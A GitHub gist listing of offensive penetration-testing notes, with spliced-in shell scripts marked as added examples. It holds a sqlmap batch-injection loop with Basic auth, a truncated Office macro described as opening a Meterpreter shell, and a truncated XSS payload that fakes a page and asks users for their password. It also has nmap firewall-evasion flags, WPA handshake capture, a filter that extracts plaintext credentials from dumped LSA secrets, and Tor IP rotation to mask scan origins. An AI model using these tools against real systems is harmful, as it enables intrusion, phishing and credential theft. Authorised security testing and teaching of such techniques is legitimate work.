Drew hoodoer

@hoodoer
hoodoer / SleuthQL Loop Tricks.txt
Last active February 13, 2021 20:56
SleuthQL loop: commands to feed the request files SleuthQL writes into sqlmap.
sleuthql.py -d domainname -f proxyHistory.xml
for i in ./*.txt; do sqlmap -r "$i" --batch; done
Force HTTPS/SSL:
--force-ssl
Random user agent:
--random-agent
hoodoer / osxMacro.txt
Created December 10, 2019 09:49
macOS MS Office Meterpreter macro (Python and MacScript)
For putting in an Excel workbook. You can ignore the Worksheets part; I used that to replace values in cells so I could tell whether a user had run macros when they sent the spreadsheet back.
Put #MACRO LOOKUP ERROR in the fields: if the user runs macros, it fixes the values, refreshes the screen, and pops a Python Meterpreter shell:
Sub Auto_Open()
'#MACRO LOOK ERROR
Worksheets("Sheet1").Range("H1") = "Quick Ratio"
hoodoer / basicAuthSqlmap.txt
Created December 10, 2019 09:44
sqlmap with HTTP Basic auth (BASICAUTHBASE64 is the base64 of "user:password")
sqlmap --users --keep-alive --dbms=sqlite --headers="Authorization: Basic BASICAUTHBASE64" -u http://SOMEURL.com
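An added example, not from these gists, that ties the SleuthQL loop and this Basic-auth header together in one POSIX sh script: it builds the Authorization header from a user:password pair, assembles sqlmap's argument list per request file with the flags from the notes above (--batch, --force-ssl, --random-agent), and keeps filenames with spaces intact. The variable names DRY_RUN, SQLMAP_AUTH, SQLMAP_EXTRA and OUTDIR, the sqlmap-out directory and the admin:s3cret credentials are my own choices; sqlmap itself must be on PATH unless DRY_RUN=1.

```shell
#!/bin/sh
# Added example, not from hoodoer's gists. Runs sqlmap over the request files
# SleuthQL wrote, optionally with an HTTP Basic Authorization header.
# DRY_RUN, SQLMAP_AUTH, SQLMAP_EXTRA and OUTDIR are my own convention.

# Turn "user:password" into the header value sqlmap's --headers expects:
# the base64 of the pair is exactly what follows "Basic ".
basic_auth_header() {
  printf 'Authorization: Basic %s' "$(printf '%s' "$1" | base64 | tr -d '\n')"
}

# Run (or, with DRY_RUN=1, just print) sqlmap for one request file.
# SQLMAP_AUTH="user:pass" adds the Basic header; SQLMAP_EXTRA holds extra
# flags such as "--force-ssl --random-agent" and is split on whitespace on purpose.
sqlmap_one() {
  reqfile=$1
  set -- -r "$reqfile" --batch --output-dir "${OUTDIR:-sqlmap-out}"
  if [ -n "${SQLMAP_AUTH:-}" ]; then
    set -- "$@" --headers "$(basic_auth_header "$SQLMAP_AUTH")"
  fi
  set -- "$@" ${SQLMAP_EXTRA:-}
  if [ "${DRY_RUN:-0}" = 1 ]; then
    # Print each argument in brackets so quoting problems are visible.
    printf 'sqlmap'; for a; do printf ' [%s]' "$a"; done; printf '\n'
  else
    sqlmap "$@"
  fi
}

# Loop over every SleuthQL request file in a directory (default: current dir).
# The loop variable is quoted when used, so "login form.txt" stays one argument.
sqlmap_batch() {
  dir=${1:-.}
  found=0
  for f in "$dir"/*.txt; do
    [ -e "$f" ] || continue
    found=1
    sqlmap_one "$f"
  done
  [ "$found" = 1 ] || { echo "no request files in $dir" >&2; return 1; }
}

# Usage (dry run first, then drop DRY_RUN to actually scan):
# DRY_RUN=1 SQLMAP_AUTH='admin:s3cret' SQLMAP_EXTRA='--force-ssl --random-agent' sqlmap_batch ./example.com
```

Run it with DRY_RUN=1 once to check that each file path and the header arrive as single arguments before letting sqlmap loose; --output-dir keeps each batch's session files together so a rerun resumes instead of starting over.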
hoodoer / betterXssBackgroundImage.txt
Last active June 2, 2021 15:24
Simple reflected XSS trick: blank the page, set a background image (such as a screenshot of an appropriate application page), and prompt the user. Great for XSS on messy pages; you can make it look like a login page quickly for a screenshot.
<html>
<body>
<script>
// Fake the application with a screenshot
document.body.outerHTML = '';
document.body.innerHTML = '';
document.body.style.backgroundImage = "url('http://localhost:80/background.png')";
document.body.style.backgroundRepeat = "no-repeat";
// Ask user to re-enter their password
hoodoer / firewallScanningTips.txt
Created December 10, 2019 09:38
Scanning through tough firewalls: tips for hard-to-detect services and firewalls that are generally a pain in the butt.
Hard-to-detect service, nmap tweaks that help:
Slow it down with -T2 or -T1
Use masscan
FIN scans (-sF)
NULL scans (-sN)
Xmas scans (-sX)
Fragmented packets (-f, or --mtu for a specific fragment size)
Padded probes (--data-length)
Custom IP TTL (--ttl)
hoodoer / wifiAttacks.txt
Created December 10, 2019 09:37
WiFi Pineapple Attacks
airmon-ng check kill
https://forums.hak5.org/topic/37247-capturing-wpawpa2-passwords-with-the-nanotetra/
On the Nano, or any other interface you can put into monitor mode:
airmon-ng start wlan1
airodump-ng -w PacketCapture wlan1mon
(Then just sit near the AP you want to crack and wait for a client to connect, so the capture includes the WPA handshake.)
hoodoer / debianVmwareMount.txt
Created December 10, 2019 09:35
Mount VMware share in Debian
/usr/bin/vmhgfs-fuse .host:/ /mnt/hgfs -o subtype=vmhgfs-fuse,allow_other
(allow_other exposes the share to every local user; when run as a non-root user it also needs user_allow_other set in /etc/fuse.conf.)
This seems to work too in fstab:
vmhgfs-fuse /mnt/hgfs fuse defaults,allow_other 0 0
hoodoer / wpscanCommands.txt
Last active November 22, 2021 19:32
WPScan commands
wpscan.rb --url http://yourwebsite.com --enumerate dbe   (database exports)
wpscan.rb --url http://yourwebsite.com --enumerate cb    (config backups)
wpscan.rb --url http://yourwebsite.com --enumerate vp    (vulnerable plugins)
wpscan.rb --url http://yourwebsite.com --enumerate vt    (vulnerable themes)
hoodoer / cmeTricks.txt
Created December 10, 2019 09:33
CrackMapExec (CME) one-liner to parse plaintext creds out of the secrets files cme --lsa writes
cat ~/.cme/logs/*secrets | egrep -v '(sha1|md5|DPAPI_SYSTEM|dpapi|NL\$KM|L\$|\$:aad3b435b51404eeaad3b435b51404ee)' | sort -u
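As an added example, not from the gist: the exclusion filter above applied to a constructed sample of CME secrets output, so you can see which lines survive. The hostnames, account names, passwords and hex values are made up; the line shapes follow the secretsdump-style output CME writes (machine-account keys, DPAPI keys, NL$KM, L$-prefixed secrets, _SC_ service passwords, DefaultPassword).

```shell
#!/bin/sh
# Added example, not from hoodoer's gist: run the exclusion filter over a
# constructed sample of CME "secrets" output and show what is left.
# Every host, account, password and hex value below is made up.

# Write the constructed sample to the path given as $1. The last line repeats
# a service password, as a second host would, to show sort -u collapsing it.
write_sample_secrets() {
  cat > "$1" <<'EOF'
$MACHINE.ACC:aes256-cts-hmac-sha1-96:4c9a0d1e6b2f7a3c8d5e1f0a9b4c7d2e6f3a8b1c0d5e9f2a7b4c1d8e3f6a0b5c
$MACHINE.ACC:des-cbc-md5:1a2b3c4d5e6f7a8b
dpapi_machinekey:0x3e2c1d0b9a8f7e6d5c4b3a2918071605f4e3d2c1
dpapi_userkey:0x0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c
DPAPI_SYSTEM:01000000aabbccddeeff00112233445566778899aabbccddeeff0011223344556677
NL$KM:0000 1A 2B 3C 4D 5E 6F 70 81 92 A3 B4 C5 D6 E7 F8 09
L$_SQSA_S-1-5-21-1111111111-2222222222-3333333333-1105:7b22766572
_SC_MSSQLSERVER:CORP\svc_sql:Summer2021!
_SC_BackupExecAgent:CORP\svc_backup:B@ckup!2021
DefaultPassword:Welcome123
_SC_MSSQLSERVER:CORP\svc_sql:Summer2021!
EOF
}

# hoodoer's filter as a function: takes one or more secrets files, or stdin
# when none are given (grep -E is the portable spelling of egrep).
filter_plaintext() {
  cat "$@" \
    | grep -E -v '(sha1|md5|DPAPI_SYSTEM|dpapi|NL\$KM|L\$|\$:aad3b435b51404eeaad3b435b51404ee)' \
    | sort -u
}

# Demo: what survives from the constructed sample (three plaintext lines).
sample=$(mktemp)
write_sample_secrets "$sample"
filter_plaintext "$sample"
rm -f "$sample"
```

Two things to keep in mind when reusing the pattern: it is an exclusion list, so any hash-shaped line type it does not name (cached-logon $DCC2$ entries, for instance, if they show up in your secrets files) passes straight through and should be added to it, and L\$ matches any "L$" substring, so a machine account whose name ends in L (SQL$, for example) is dropped along with the L$_ secrets it was meant to catch.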
hoodoer / Tor ghost auto IP switching.txt
Created December 10, 2019 09:31
TorGhost auto IP switching with logging
Use a simple watch -n 30 torghost switch
That'll get you a new exit IP at regular intervals.
Logging the IP addresses isn't as clean. Do this (make sure you proxy through Burp, and have Burp's upstream proxy configured to use Tor):
watch -n 15 -t curl --proxy http://127.0.0.1:8080 -s ipinfo.io/ip >> torSourceIPs.txt
Because the redirect captures watch's screen output (cursor and clear-screen control sequences) along with curl's, you'll often not see the addresses when you cat the file, but they're there if you open it in Sublime or similar.
You can grep them out cleanly with this:
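An added example, not part of the gist, in two pieces: a logger that polls the exit IP through Burp (127.0.0.1:8080, as in the note) with a plain loop instead of watch, so the file holds one timestamped address per line, and an extractor that pulls IPv4 addresses out of a log captured the watch way, control sequences and all. The sample log bytes are constructed, using RFC 5737 documentation addresses; the function names are my own.

```shell
#!/bin/sh
# Added example, not from hoodoer's gist. Function names and the sample log
# are my own; the curl invocation is the one from the note.

# Poll the current exit IP every N seconds (default 15), one timestamped
# line per poll. Redirect to a file to keep the log; Burp must be listening
# on 127.0.0.1:8080 with Tor as its upstream proxy for the address to be Tor's.
log_exit_ips() {
  interval=${1:-15}
  while :; do
    ip=$(curl --proxy http://127.0.0.1:8080 -s ipinfo.io/ip)
    printf '%s %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$ip"
    sleep "$interval"
  done
}

# Pull dotted-quad addresses out of any file, ignoring the escape sequences
# watch writes, range-check each octet so a stray "300.1.2.3" is not reported,
# and collapse consecutive repeats so each exit change shows up once.
extract_ips() {
  grep -a -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' "$@" \
    | awk -F. '$1<=255 && $2<=255 && $3<=255 && $4<=255' \
    | uniq
}

# Constructed sample of what "watch -t curl ... >> file" leaves behind:
# alternate-screen, cursor-home and clear-screen sequences around each result,
# with one deliberately invalid address mixed in.
write_sample_watch_log() {
  printf '\033[?1049h\033[H\033[2J203.0.113.7\033[H\033[2J203.0.113.7\033[H\033[2J198.51.100.22\033[H\033[2J300.1.2.3\033[H\033[2J203.0.113.7\033[?1049l' > "$1"
}

# Demo on the constructed log: prints 203.0.113.7, 198.51.100.22, 203.0.113.7.
log=$(mktemp)
write_sample_watch_log "$log"
extract_ips "$log"
rm -f "$log"
```

The timestamps from log_exit_ips are what make the log useful later: they let you line up each exit address with the Burp history when a client asks which source IP hit them at a given time.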